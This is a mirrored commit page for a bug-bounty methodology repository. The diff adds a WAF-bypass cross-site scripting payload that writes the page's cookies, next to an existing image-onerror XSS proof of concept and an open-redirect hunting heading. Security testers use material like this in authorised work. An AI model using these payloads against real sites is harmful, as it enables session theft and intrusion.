mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-10 06:04:20 +00:00
GITBOOK-56: change request with no subject merged in GitBook
This commit is contained in:
parent
108a5d42cc
commit
0216b95d55
1 changed files with 6 additions and 0 deletions
|
@ -75,6 +75,12 @@ The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | (
|
|||
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
|
||||
```
|
||||
|
||||
**Bypass Waf Pyaload:**
|
||||
|
||||
```
|
||||
<%2FScriPt><sCripT+class%3DDrakenKun>document.write(document.cookie);<%2FsCriPt>
|
||||
```
|
||||
|
||||
### Open Redirect Mass Hunt
|
||||
|
||||
* tool = ragno, qsreplace
|
||||
|
|
Loading…
Reference in a new issue